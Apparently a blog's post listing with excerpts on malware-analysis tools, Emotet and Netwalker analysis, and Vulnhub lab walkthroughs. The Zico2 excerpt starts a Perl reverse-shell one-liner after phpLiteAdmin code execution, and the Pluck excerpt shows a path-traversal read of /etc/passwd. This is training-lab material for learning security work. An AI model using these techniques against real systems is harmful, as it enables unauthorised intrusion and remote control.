發表文章

0xbc’s Basic Malware Analysis Blog Series

 小魯最近工作碰了一些逆向工程跟惡意程式分析 菜雞如我決定把一些過程記錄在HackMD,大概有七個主題 希望能幫到這方面跟我一樣的初學者,有問題都歡迎留言 目錄 https://hackmd.io/@0xbc000/H1Z9yJcmw 小魯還是菜鳥請多包涵 😛 -0xbc

惡意程式分析 - 常用工具篇

前言 工作的關係,最近接觸了一點 Malware跟逆向的東西,把常用的工具跟用途紀錄一下,怕以後自己忘記....希望能不定時更新  本篇會分為四個部分來記錄 執行環境 靜態分析 動態分析 以及最後的懶人包 執行環境 最常見的就是Windows,個人偏好用Windows 7 64 bits,很常見也可以裝很多東西,惡意程式大多都是針對Windows 而設計的 另一個很好用的執行環境是 REMnux, 裡面已經預載了很多常用的工具接下來會提到 連結可以參考這裏  https://remnux.org/  以及官方文檔  https://docs.remnux.org/ 靜態分析 顧名思義,不想執行惡意程式但想看看裡頭的內容,針對Windows的話可以用下列工具 PE Studio - 需要額外安裝。可以做初步的分析,同時可以知道是否有Anti-debug/analysis 阻擋著我們 IDA - 逆向標配,可以看assembly,同時也具有Debug功能 Ghidra PE Bear/ PE View - 可以針對PE檔案格式做深入研究 oledump.py - 針對Office格式(Word, Excel)分析裡面的Macro pdf-parser.py - 針對PDF格式分析裡面的Object 動態分析 靜態分析完了之後想驗證自己的想法,可以使用動態分析 動態分析方法比較多種,但大致可以分成自動跟手動, 本魯比較偷懶,比較常用自動分析 Cuckoo - 沙盒標配,資料相當完整,但偶而會被Anti-debug/analysis的招式抓到直接不執行 ANY.RUN - 最簡單就是丟到Cuckoo這類的沙盒,不過最近發現了個很好用且免費的工具,他可以直接跟沙盒內的Windows VM做互動。唯一缺點是只支援Windows平台 對於不屑用沙箱的逆向大神們,先受我一拜........ 喜歡手動的話,也是有些工具可以推薦 Process Hacker - 高配版工作管理員,記錄所有執行中的程式以及詳細內容 (Mutex, process handle.....) 一邊執行一邊看著,通常可以很好發現 Process Injection的特徵 Process Explorer - 記錄所有API usage,但建議搭配視覺化工具像是ProcDOT,比較好看一點,或至少要用內建的

Netwalker malware deobfuscation - From PowerShell to EXE

圖片

Emotet word document malware analysis

圖片
最近開始學習一點逆向工程方面的技巧 這篇主要是Word文件的分析, 之後下一篇會針對裡面夾帶的exe檔案做分析 逆向分析Emotet-1 主要思路是尋找檔案中夾帶Macro的Section, 並且尋找可疑的文字 powershell, ip address, URL, 檔案名稱 使用的環境是REMnux, download from here 使用的工具是oledump.py, 已經內建在REMnux裡面 新手分析還請多包涵 :P -0xbc

Vulnhub Zico2: 1 Walkthrough

圖片
This article is walk through about zico machine in vulnub VM can download from here: https://www.vulnhub.com/entry/zico2-1,210/ As a shortcut, the method I use: LFI operation system exploit Let's Start: As always, start finding the IP for machine, mine is 172.16.194.203 nmap scan, find port open on 22,80,111 dirb scan, found interesting dbadmin folder after browse, found php login with password "admin" After login, found version is phpLiteAdmin 1.9.3 phpLiteAdmin 1.9.3 is vulnerable to Remote Code Execution https://www.exploit-db.com/exploits/24044/ After using RCE, for example I can execute "locate nc" in victim machine: Exploit: After some try and error, I found I can use perl reverse shell found other kinds of reverse shell-> locate perl in /usr/bin/perl ->do  /usr/bin/perl -h will give feedback /usr/bin/perl -e 'use Socket;$i="172.16.194.142";$p=1234;socket(

Vulnhub Pluck 1 Walk Through

圖片
This article is walk through for Pluck1 boot2root machine. Can be download from vulnhub: https://www.vulnhub.com/entry/pluck-1,178/ As a shortcut, exploit knowledge I use in this machine:  LFI Shell escape SUID exploit Let's start First as always, find the address by netdiscover or arp-scan -r is for 'range' option Information Gathering After found address, use nmap to scan which port is open, we got 22, 80, 3306 First start with http, we see a page and with some option on the top When I browse the About option, it shows some file with URL page=about.php It means it could be LFI if it don't have sanitize input So next I try to put page=../../../../../etc/passwd  Bingo!  Got passwd file and on the bottom line there is an interesting user name backup with a script file Use LFI again to see what's inside this file content is  we can get in via tftp and in file /back

Vulnhub Lazysysadmin walk through

圖片
This is writeup for Vulnhub machine: Lazysysadmin Machine can be download from here: https://www.vulnhub.com/entry/lazysysadmin-1,205/ Target IP is 172.16.194.199 Next, run nmap scan: Found port 22, 80, 139, 445, 3306, 6667 I start with http scan Found wordpress and phpmyadmin, looks really interesting! Try to dig more with wpsccan and see the site: There is "My name is togie", this looks interesting, maybe the system's username or something else Run wpscan: Try some default credentials on wordpress login, but not work... After I cannot dig anything, I try to turn into samba service: Next, try to access the server with smbclient: Great! We can access without any password. And we have file name deets.txt, open on browser and got: Try again on wordpress, but not work. Next file is default password file wp-config.php After get the file, open it and